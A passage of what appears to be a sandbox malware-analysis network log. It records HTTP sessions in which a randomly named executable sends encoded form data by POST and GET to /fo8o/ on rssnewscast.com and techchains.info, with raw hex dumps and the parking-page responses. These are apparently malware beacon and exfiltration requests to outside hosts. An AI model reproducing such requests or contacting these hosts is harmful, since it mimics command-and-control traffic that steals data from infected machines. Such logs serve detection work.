70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 2f 59 32 62 39 55 71 7a 7a 63 47 32 64 62 4f 6d 77 6e 56 59 51 62 67 2f 6b 49 4e 49 58 33 73 49 52 56 36 6c 36 57 4c 72 4a 36 51 36 78 53 50 4d 41 3d 3d Data Ascii: 6d6p=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p/Y2b9UqzzcG2dbOmwnVYQbg/kINIX3sIRV6l6WLrJ6Q6xSPMA==
Jan 13, 2025 09:28:41.860450029 CET	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 13 Jan 2025 08:28:41 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 13, 2025 09:28:42.038321972 CET	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 13 Jan 2025 08:28:41 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49985	91.195.240.94	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:28:43.635529995 CET	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 62 37 6d 73 37 66 78 71 5a 4b 51 52 69 6f 59 69 71 30 2b 66 36 33 6a 7a 4c 61 7a 7a 63 37 47 78 6e 4a 4e 41 48 36 75 4d 76 54 65 61 52 38 46 30 3d Data Ascii: 6d6p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjb7ms7fxqZKQRioYiq0+f63jzLazzc7GxnJNAH6uMvTeaR8F0=
Jan 13, 2025 09:28:44.282344103 CET	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 13 Jan 2025 08:28:44 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49986	91.195.240.94	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:28:46.165473938 CET	1827	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 5a 41 33 54 36 58 6f 6c 52 6a 6d 73 4b 79 68 55 33 62 61 5a 31 66 75 45 79 69 50 6e 59 6e 75 6d 6c 41 4e 56 46 4f 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 44 47 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 [TRUNCATED] Data Ascii: 6d6p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gZA3T6XolRjmsKyhU3baZ1fuEyiPnYnumlANVFOhO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swDGayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdFN+GzeOFs4KTirg6C1sh2UiW7PC3d24PmACz9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvb/iR6EQm7N74DrGQltGoA9vQXe0U2WPAe6bUcuOytdVwDMLHWNljpMefi/eWMjBUT3fjnIBpGONwD9rkkkIn+A7mFG+9xOsSmAUadtBX1dk9kUunNCqcl4f5MCW2BzPEOIR+e1ay8+hQ/ChRBPJwVWCGCWyf3Fkc2QBWfWPpp2E0RNOC+qW+ZxRVGuFuU2jzCm3jC5K4XbHCo/XzN6uMOrLPKX9Id5yGp9dWFkEWajtGUwXHVqBD7XTrjK/9L1w9OIePw+fEL6nm3Et6Mb99sz5OhAPvI995o9xsandSKPRIb/l8R2VgFBpDuMDVg7ItrwyuW2m2egK0ARbeIm3mD0EGjFM4uDzJg5ygjfSCBYiDSbgNs9AuiJ0a6aGr+HU9GZNSA6oWbQ7w7MfgUnz1Q/p0lddhTt6LmofjJX6Zvd9Cn2njiht9vpMm5kR2xt0B3helFWHYSC016023sLPWr3P1dil9p2vglsZ/Aq/YAly1yICJ3leJvCv3YvekhQdjXQzacR8k3S/g61qg [TRUNCATED]
Jan 13, 2025 09:28:46.818919897 CET	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 13 Jan 2025 08:28:46 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49987	91.195.240.94	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:28:48.708424091 CET	529	OUT	GET /fo8o/?6d6p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&DZb=zf440xcx6XAL HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:28:49.369004011 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 08:28:49 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Wh2K3c2hxtnxjrKnuUJvfB8qZ1VuO31g+ZkbbN6372TsRxb0mE/cs5uGNhmbHYewLYaNjps8A4o91FzMfkY61g== last-modified: Mon, 13 Jan 2025 08:28:49 GMT x-cache-miss-from: parking-7df97dc48-9pwc7 server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 57 68 32 4b 33 63 32 68 78 74 6e 78 6a 72 4b 6e 75 55 4a 76 66 42 38 71 5a 31 56 75 4f 33 31 67 2b 5a 6b 62 62 4e 36 33 37 32 54 73 52 78 62 30 6d 45 2f 63 73 35 75 47 4e 68 6d 62 48 59 65 77 4c 59 61 4e 6a 70 73 38 41 34 6f 39 31 46 7a 4d 66 6b 59 36 31 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Wh2K3c2hxtnxjrKnuUJvfB8qZ1VuO31g+ZkbbN6372TsRxb0mE/cs5uGNhmbHYewLYaNjps8A4o91FzMfkY61g==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Jan 13, 2025 09:28:49.369044065 CET	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
Jan 13, 2025 09:28:49.369064093 CET	448	IN	Data Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
Jan 13, 2025 09:28:49.369101048 CET	1236	IN	Data Raw: 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65 74 Data Ascii: arance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[t
Jan 13, 2025 09:28:49.369119883 CET	1236	IN	Data Raw: 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 0d 0a 35 37 36 0d 0a 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f 20 32 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 Data Ascii: ontent{color:#717171}.container-content576{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat center top;background-size:100%}.container-content__contai
Jan 13, 2025 09:28:49.369151115 CET	1236	IN	Data Raw: 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d Data Ascii: nderline;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:576#0a48ff}.two-tier-ads-list__
Jan 13, 2025 09:28:49.369169950 CET	1236	IN	Data Raw: 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 31 39 64 61 36 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f Data Ascii: t{font-size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;fon
Jan 13, 2025 09:28:49.369199991 CET	548	IN	Data Raw: 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e Data Ascii: inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#555}.container-cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__conten
Jan 13, 2025 09:28:49.369221926 CET	1236	IN	Data Raw: 31 35 44 38 0d 0a 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 73 6d 61 6c 6c 7d 2e 63 6f 6e 74 61 69 6e 65 Data Ascii: 15D8ntainer-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:
Jan 13, 2025 09:28:49.369250059 CET	224	IN	Data Raw: 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 Data Ascii: -large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{backgro
Jan 13, 2025 09:28:49.374286890 CET	1236	IN	Data Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 Data Ascii: und-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49988	66.29.149.46	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:02.633562088 CET	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 